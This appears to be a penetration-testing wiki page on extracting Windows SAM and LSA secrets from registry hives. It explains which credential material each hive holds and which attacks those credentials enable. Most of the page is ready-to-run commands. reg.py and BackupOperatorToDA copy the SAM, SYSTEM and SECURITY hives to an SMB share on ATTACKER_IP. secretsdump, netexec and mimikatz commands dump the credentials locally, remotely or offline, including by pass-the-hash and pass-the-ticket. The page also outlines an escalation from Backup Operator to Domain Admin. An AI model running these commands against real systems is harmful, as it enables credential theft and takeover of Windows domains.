SAM & LSA secrets
Theory
In Windows environments, passwords are stored in a hashed format in registry hives like SAM (Security Account Manager) and SECURITY.
| Hive | Details | Format or credential material |
|---|---|---|
| SAM | stores locally cached credentials (referred to as SAM secrets) | LM or NT hashes |
| SECURITY | stores domain cached credentials (referred to as LSA secrets) | Plaintext passwords, LM or NT hashes, Kerberos keys (DES, AES), Domain Cached Credentials (DCC1 and DCC2), Security Questions (L$SQSA<SID>), |
| SYSTEM | contains enough info to decrypt SAM secrets and LSA secrets | N/A |
SAM and LSA secrets can be dumped either locally or remotely from the mounted registry hives. These secrets can also be extracted offline from the exported hives. Once the secrets are extracted, they can be used for various attacks, depending on the credential format.
| Credential material | Subsequent attacks |
|---|---|
| Plaintext passwords | credential spraying, stuffing, shuffling or silver tickets |
| LM and NT hashes | credential spraying, stuffing, shuffling, cracking, pass-the-hash |
| Kerberos keys (RC4, i.e. == NT hash) | credential cracking, overpass-the-hash or silver tickets |
| Kerberos keys (DES, AES) | credential cracking, pass-the-key or silver tickets |
| Domain Cached Credentials (DCC1 or DCC2) | credential cracking |
Practice
Exfiltration
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=== UNIX-like
Impacket's reg.py (Python) script can also be used to do the same operation remotely for a UNIX-like machine. For instance, this can be used to easily escalate from a Backup Operator member to a Domain Admin by dumping a Domain Controller's secrets and use them for a DCSync.
# start an SMB share
smbserver.py -smb2support "someshare" "./"
# save each hive manually
reg.py "domain"/"user":"password"@"target" save -keyName 'HKLM\SAM' -o '\\ATTACKER_IPs\someshare'
reg.py "domain"/"user":"password"@"target" save -keyName 'HKLM\SYSTEM' -o '\\ATTACKER_IP\someshare'
reg.py "domain"/"user":"password"@"target" save -keyName 'HKLM\SECURITY' -o '\\ATTACKER_IP\someshare'
# backup all SAM, SYSTEM and SECURITY hives at once
reg.py "domain"/"user":"password"@"target" backup -o '\\ATTACKER_IP\someshare'
=== Live Windows
When the Windows operating system is running, the hives are in use and mounted. The command-line tool named reg can be used to export them.
reg save HKLM\SAM "C:\Windows\Temp\sam.save"
reg save HKLM\SECURITY "C:\Windows\Temp\security.save"
reg save HKLM\SYSTEM "C:\Windows\Temp\system.save"
This operation can be conducted remotely with BackupOperatoToDA (C++).
BackupOperatorToDA.exe -d "domain" -u "user" -p "password" -t "target" -o "\\ATTACKER_IP\someshare"
=== Down Windows
When Windows is not running, the hives are not mounted and they can be copied just like any other file. This can be operated when mounting the hard drive from another OS (e.g. when booting the computer on another operating system). The hive files can be found at the following locations.
\system32\config\sam
\system32\config\security
\system32\config\system
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Secrets dump
Here are some examples and tools that can be used for local/remote/offline dumping.
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=== secretsdump
Impacket's secretsdump (Python) can be used to dump SAM and LSA secrets, either remotely, or from local files. For remote dumping, several authentication methods can be used like pass-the-hash (LM/NTLM), or pass-the-ticket (Kerberos).
# Remote dumping of SAM & LSA secrets
secretsdump.py 'DOMAIN/USER:PASSWORD@TARGET'
# Remote dumping of SAM & LSA secrets (pass-the-hash)
secretsdump.py -hashes 'LMhash:NThash' 'DOMAIN/USER@TARGET'
# Remote dumping of SAM & LSA secrets (pass-the-ticket)
secretsdump.py -k 'DOMAIN/USER@TARGET'
# Offline dumping of LSA secrets from exported hives
secretsdump.py -security '/path/to/security.save' -system '/path/to/system.save' LOCAL
# Offline dumping of SAM secrets from exported hives
secretsdump.py -sam '/path/to/sam.save' -system '/path/to/system.save' LOCAL
# Offline dumping of SAM & LSA secrets from exported hives
secretsdump.py -sam '/path/to/sam.save' -security '/path/to/security.save' -system '/path/to/system.save' LOCAL
=== netexec
NetExec (Python) can be used to remotely dump SAM and LSA secrets, on multiple hosts. It offers several authentication methods like pass-the-hash (NTLM), or pass-the-ticket (Kerberos)
# Remote dumping of SAM/LSA secrets
netexec smb $TARGETS -d $DOMAIN -u $USER -p $PASSWORD --sam/--lsa
# Remote dumping of SAM/LSA secrets (local user authentication)
netexec smb $TARGETS --local-auth -u $USER -p $PASSWORD --sam/--lsa
# Remote dumping of SAM/LSA secrets (pass-the-hash)
netexec smb $TARGETS -d $DOMAIN -u $USER -H $NThash --sam/--lsa
# Remote dumping of SAM/LSA secrets (pass-the-ticket)
netexec smb $TARGETS --kerberos --sam/--lsa
=== Mimikatz
Mimikatz can be used locally with lsadump::sam and lsadump::secrets to extract credentials from SAM and SECURITY registry hives (and SYSTEM for the encryption keys), or offline with hive dumps.
# Local dumping of SAM secrets on the target
lsadump::sam
# Offline dumping of SAM secrets from exported hives
lsadump::sam /sam:'C:\path\to\sam.save' /system:'C:\path\to\system.save'
# Local dumping of LSA secrets on the target
lsadump::secrets
# Offline dumping LSA secrets from exported hives
lsadump::secrets /security:'C:\path\to\security.save' /system:'C:\path\to\system.save'
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Resources
http://moyix.blogspot.com/2008/02/syskey-and-sam.html
http://moyix.blogspot.com/2008/02/decrypting-lsa-secrets.html
https://medium.com/@benichmt1/secretsdump-demystified-bfd0f933dd9b
https://webstersprodigy.net/2014/02/03/mscash-hash-primer-for-pentesters/